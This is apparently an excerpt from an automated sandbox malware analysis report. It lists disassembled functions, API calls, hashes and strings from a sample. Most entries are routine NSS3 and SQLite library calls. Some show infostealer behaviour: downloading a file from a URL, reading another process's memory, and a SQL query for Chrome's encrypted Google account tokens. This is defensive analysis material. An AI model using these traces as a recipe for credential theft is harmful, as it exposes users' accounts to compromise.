                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAC3ED6
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAC3EEE
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: PR_CallOnce.NSS3(6CC22AA4,6CB212D0), ref: 6CAC3F02
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: PL_FreeArenaPool.NSS3 ref: 6CAC3F14
                                                                                                                                                                                                                • Part of subcall function 6CAC3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAC3F27
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3941837925-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CAC40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CAC3F7F,?,00000055,?,?,6CAC1666,?,?), ref: 6CAC40D9
                                                                                                                                                                                                                • Part of subcall function 6CAC40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CAC1666,?,?), ref: 6CAC40FC
                                                                                                                                                                                                                • Part of subcall function 6CAC40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CAC1666,?,?), ref: 6CAC4138
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CAC7CFD
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6CBE9030), ref: 6CAC7D1B
                                                                                                                                                                                                                • Part of subcall function 6CB1FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CAC1A3E,00000048,00000054), ref: 6CB1FD56
                                                                                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,6CBE9048), ref: 6CAC7D2F
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CAC7D50
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CAC7D61
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CAC7D7D
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAC7D9C
                                                                                                                                                                                                              • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CAC7DB8
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE023,00000000), ref: 6CAC7E19
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 70581797-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.MOZGLUE(?,00000000,00000000,?,?,?,6CAD80DD), ref: 6CAD7F15
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CAD80DD), ref: 6CAD7F36
                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,6CAD80DD), ref: 6CAD7F3D
                                                                                                                                                                                                              • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CAD80DD), ref: 6CAD7F5D
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,6CAD80DD), ref: 6CAD7F94
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CAD7F9B
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE08B,00000000,6CAD80DD), ref: 6CAD7FD0
                                                                                                                                                                                                              • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CAD80DD), ref: 6CAD7FE6
                                                                                                                                                                                                              • free.MOZGLUE(?,6CAD80DD), ref: 6CAD802D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4037168058-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB1FF00
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB1FF18
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CB1FF26
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB1FF4F
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB1FF7A
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB1FF8C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1233137751-0
                                                                                                                                                                                                              • Opcode ID: dcfbf9040530a7f09a711ea8c17f0e2259a23e3df23c09d6e8e0700c9f4818b5
                                                                                                                                                                                                              • Instruction ID: b2a40f3efa5e4bccf87a1a9264b6504b68429d96df3f1a6ed4eb2167db4acb85
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcfbf9040530a7f09a711ea8c17f0e2259a23e3df23c09d6e8e0700c9f4818b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B73123B290A3D69BEB108F549840B6BB7A8EF42348F150139EC1C97F01E7B1D904C7D2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00926836
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00926856
                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00926877
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00926892
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 009268C8
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009268F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00926923
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0092692A
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926936
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                                                              • Opcode ID: 46e786a96e1d4f47c3247cb9208b9cd64a9bd0a83e3238747515bbb6d4ec33d4
                                                                                                                                                                                                              • Instruction ID: 42516a5ae333fc2828079fc9e04ed514d7e4be4de2f80fd0063f4caf0a4eef8b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e786a96e1d4f47c3247cb9208b9cd64a9bd0a83e3238747515bbb6d4ec33d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01412CB5901128ABDB209B20ED45BDA7BBCEF48300F1005A5BB19A7166DA309EC5CF94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 009467C4
                                                                                                                                                                                                              • _free.LIBCMT ref: 009467D2
                                                                                                                                                                                                              • _free.LIBCMT ref: 009467DD
                                                                                                                                                                                                              • _free.LIBCMT ref: 009467B1
                                                                                                                                                                                                                • Part of subcall function 0093DACB: HeapFree.KERNEL32(00000000,00000000,?,0093D321,00000000,0095B79C,0093D368,0092EE93,?,?,0093D452,0095B79C,?,?,0094EDC8,0095B79C), ref: 0093DAE1
                                                                                                                                                                                                                • Part of subcall function 0093DACB: GetLastError.KERNEL32(?,?,?,0093D452,0095B79C,?,?,0094EDC8,0095B79C,?,?,?), ref: 0093DAF3
                                                                                                                                                                                                              • ___free_lc_time.LIBCMT ref: 009467FB
                                                                                                                                                                                                              • _free.LIBCMT ref: 00946806
                                                                                                                                                                                                              • _free.LIBCMT ref: 0094682B
                                                                                                                                                                                                              • _free.LIBCMT ref: 00946842
                                                                                                                                                                                                              • _free.LIBCMT ref: 00946851
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3704779436-0
                                                                                                                                                                                                              • Opcode ID: 059af26c4450fde36301817a33277e07d03a58180d1a4a242954a6c520e1c190
                                                                                                                                                                                                              • Instruction ID: 54af4d8ec7a557df624ce6b8bf756cd26085ce8f098bb66aa4144f9dc10b9790
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 059af26c4450fde36301817a33277e07d03a58180d1a4a242954a6c520e1c190
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC118FB25053019BDB31AF64E985F5A73EDEB42324F18483EE144D7202DB32DC84CB12
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CB2536F,00000022,?,?,00000000,?), ref: 6CB24E70
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000000), ref: 6CB24F28
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CB24F8E
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CB24FAE
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB24FC8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                              • String ID: %s=%c%s%c$%s=%s
                                                                                                                                                                                                              • API String ID: 2709355791-2032576422
                                                                                                                                                                                                              • Opcode ID: 6630e9ef5b0053bb66ce6f6d73a57250ecf7783a2730a14e8d6e98c421cd4c9e
                                                                                                                                                                                                              • Instruction ID: a00c3495d57cd6889e336fdad2281c18e10383adb5942f136c172c7343dc3eea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6630e9ef5b0053bb66ce6f6d73a57250ecf7783a2730a14e8d6e98c421cd4c9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D512A31A051D58BFF15DA6984907FF7BF5EF46308F288125E89CA7E40D32D88458F92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA67E27
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA67E67
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CA67EED
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA67F2E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA4FD7A
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4FD94
                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA4FE3C
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4FE83
                                                                                                                                                                                                                • Part of subcall function 6CA4FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CA4FEFA
                                                                                                                                                                                                                • Part of subcall function 6CA4FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CA4FF3B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0092FBB8,?,00000000,00000000,?,?), ref: 0092F909
                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0092FBB8,?,00000000,00000000), ref: 0092F933
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0092F980
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0092F9D9
                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0092FA31
                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0092FBB8,?,00000000,00000000,?,?), ref: 0092FA42
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,00000000,?,6CAE124D,00000001), ref: 6CAD8D19
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CAE124D,00000001), ref: 6CAD8D32
                                                                                                                                                                                                              • PL_ArenaRelease.NSS3(?,?,?,?,?,6CAE124D,00000001), ref: 6CAD8D73
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CAE124D,00000001), ref: 6CAD8D8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CAE124D,00000001), ref: 6CAD8DBA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                              • String ID: KRAM$KRAM
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBD0EE6
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBD0EFA
                                                                                                                                                                                                                • Part of subcall function 6CABAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CABAF0E
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F16
                                                                                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F1C
                                                                                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F25
                                                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBD0F2B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB94DC3
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB94DE0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • misuse, xrefs: 6CB94DD5
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB94DCB
                                                                                                                                                                                                              • invalid, xrefs: 6CB94DB8
                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6CB94DBD
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB94DDA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB94E30
                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB94E4D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • misuse, xrefs: 6CB94E42
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB94E38
                                                                                                                                                                                                              • invalid, xrefs: 6CB94E25
                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6CB94E2A
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB94E47
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00929B87
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00929BA4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00929C53
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00929C6E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                                                              • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                              • API String ID: 3306365304-1713091031
                                                                                                                                                                                                              APIs
